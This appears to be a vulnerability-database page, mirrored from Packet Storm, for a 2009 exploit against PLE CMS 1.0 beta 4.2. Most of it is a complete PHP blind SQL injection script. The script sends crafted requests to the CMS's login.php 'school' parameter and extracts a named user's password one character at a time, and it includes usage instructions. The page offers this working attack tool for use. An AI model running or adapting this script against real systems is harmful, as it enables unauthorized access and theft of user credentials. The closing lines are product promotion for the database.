Lucene search
K

PLE CMS 1.0 Beta 4.2 SQL Injection

🗓️ 30 Jan 2009 00:00:00Reported by darkjokerType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

PLE CMS 1.0 Beta 4.2 SQL Injectio

Code
`--+++==============================================================+++--  
--+++====== PLE CMS 1.0 beta 4.2 Blind SQL Injection Exploit ======+++--  
--+++==============================================================+++--  
  
<?php  
  
function query ($user, $pos, $chr)  
{  
$query = "123 OR ASCII(SUBSTRING((SELECT password FROM users WHERE userID = '{$user}'),{$pos},1))={$chr}";  
$query = str_replace (" ", "%20", $query);  
$query = str_replace ("'", "%27", $query);  
return $query;  
}  
  
function exploit ($hostname, $path, $user, $pos, $chr)  
{  
$chr = ord ($chr);  
$fp = fsockopen ($hostname, 80);  
  
$get = "GET {$path}/login.php?school=" . query ($user, $pos, $chr) . " HTTP/1.1\r\n".  
"Host: {$hostname}\r\n".  
"Connection: Close\r\n\r\n";  
  
fputs ($fp, $get);  
  
while (!feof ($fp))  
$x .= fgets ($fp, 1024);  
  
  
fclose ($fp);  
  
if (preg_match ("/ERROR: School not found!/", $x))  
return false;  
else  
return true;  
}  
  
function usage ()  
{  
exit (  
"\nPLE CMS 1.0 beta 4.2 Blind SQL Injection Exploit".  
"\n[+] Author: darkjoker".  
"\n[+] Site : http://darkjoker.net23.net".  
"\n[+] Download: http://kent.dl.sourceforge.net/sourceforge/plecms/plecms_beta4_2.zip".  
"\n[+] Usage : php xpl.php <hostname> <path> <username> <key>".  
"\n[+] Ex. : php xpl.php localhost /PLECMS root abcdefghijklmnopqrstuvwxyz0123456789".  
"\n\n");  
}  
  
if ($argc < 4)  
usage ();  
  
$hostname = $argv [1];  
$path = $argv [2];  
$user = $argv [3];  
$key = (empty ($argv [4])) ? "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" : $argv [4];  
$chr = 0;  
$pos = 1;  
  
print "\n[+] Password: ";  
  
while ($chr < strlen ($key))  
{  
if (exploit ($hostname, $path, $user, $pos, $key [$chr]))  
{  
echo $key [$chr];  
$chr = 0;  
$pos++;  
}  
else  
$chr++;  
}  
  
print "\n\n";  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation